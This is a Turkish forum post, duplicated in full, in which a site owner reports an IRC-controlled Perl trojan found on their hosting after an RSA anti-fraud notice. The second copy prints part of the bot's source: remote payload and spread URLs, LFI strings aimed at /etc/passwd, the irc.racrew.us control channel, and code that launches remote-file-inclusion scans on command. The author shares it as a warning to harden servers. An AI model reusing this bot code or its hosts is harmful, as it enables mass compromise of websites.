Selam,
Sitemin biri için "RSA Anti-Fraud Command Center
([email protected])" adresinden bir mail gelmiş geçen gün. Mailde sitemin birinde bilgim dışında biri trojan scan ettiriyormuş. (Adresi vermeyeceğim güvenlik açısından.)
Bu virüs, sitemin chmodu 777 olan bir klasöre bir şekilde bulaştırılmış, perl ve php kodlarıyla yazılmış IRC üzerinden yönetilen bir oto-scan trojan/virüstür.
RSA nın belirttiği dosyanın bulunduğu klasöre baktığımda 10-20 arası dosya bulunmaktaydı. Silmeye çalıştığımda ise, bir kaçı silinmedi. Silinmeyen dosyaların birinin içinde;
Şeklinde devam eden bir kod buldum. Bu trojanın kontrolü irc.racrew.us sunucusundaki yöneticiler (mi desem artık user mi desem) tarafından yapılıyor.
Sunucuya girip nelerin olup bittiğine bakabilirsiniz.
Sunucularınızdaki güvenliği arttırmanız tavsiye edilir.
Bu arada trojanı bhlynx script yardımıyla çoğaltıyorlar sanırım.
Sitemin biri için "RSA Anti-Fraud Command Center
([email protected])" adresinden bir mail gelmiş geçen gün. Mailde sitemin birinde bilgim dışında biri trojan scan ettiriyormuş. (Adresi vermeyeceğim güvenlik açısından.)
Bu virüs, sitemin chmodu 777 olan bir klasöre bir şekilde bulaştırılmış, perl ve php kodlarıyla yazılmış IRC üzerinden yönetilen bir oto-scan trojan/virüstür.
RSA nın belirttiği dosyanın bulunduğu klasöre baktığımda 10-20 arası dosya bulunmaktaydı. Silmeye çalıştığımda ise, bir kaçı silinmedi. Silinmeyen dosyaların birinin içinde;
Kod:
#################
#[Configuration]#
#################
my $response = "http://www.zinforma.com/arab.txt"; # included in zip as response.txt
my $test = "http://need-this.info/pretty/234/control/id2.txt"; # included in zip as test.txt
my $printcmd = "-=Hidup Hanya Sebuah Ilusi=-";
my $responselfi = "/../../../../../../../../etc/passwd";
my $printcmdlfi = "/../../../../../../../../etc/passwd";
my $spread = "http://www.teste.dark-hosting.be/mohaa/echo.txt";
my $nickname = "TDO^Scan".(int(rand(999)));
my $ident = "racrew";
my $channel = "#tondano";
my $server = "irc.racrew.us";
my $port = 6667;
#################
#[Configuration]#
#################
my $sock;
my $exploitcounter = 100;
my @User_Agent = &Agent();
my $pid = fork();
if($pid==0){
&connectirc($nickname,$ident,$channel,$server,$port);
}else{
exit(0);
}
sub connectirc(){
my($nickname,$ident,$channel,$server,$port)=@_;
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server",PeerPort=>$port);
$sock->autoflush(1);
print $sock "NICK ".$nickname."\r\n";
print $sock "USER ".$ident." 8 * : r@cRew \r\n";
print $sock "JOIN ".$channel."\r\n";
while( $command = <$sock> ){
if($command =~ /\!rfi\s+(.*?)\s+(.*)/){
if(fork() == 0){
my($bug,$dork)=($1,$2);
&scan($bug,$dork);
exit(0);
}
}Şeklinde devam eden bir kod buldum. Bu trojanın kontrolü irc.racrew.us sunucusundaki yöneticiler (mi desem artık user mi desem) tarafından yapılıyor.
Sunucuya girip nelerin olup bittiğine bakabilirsiniz.
Sunucularınızdaki güvenliği arttırmanız tavsiye edilir.
Bu arada trojanı bhlynx script yardımıyla çoğaltıyorlar sanırım.
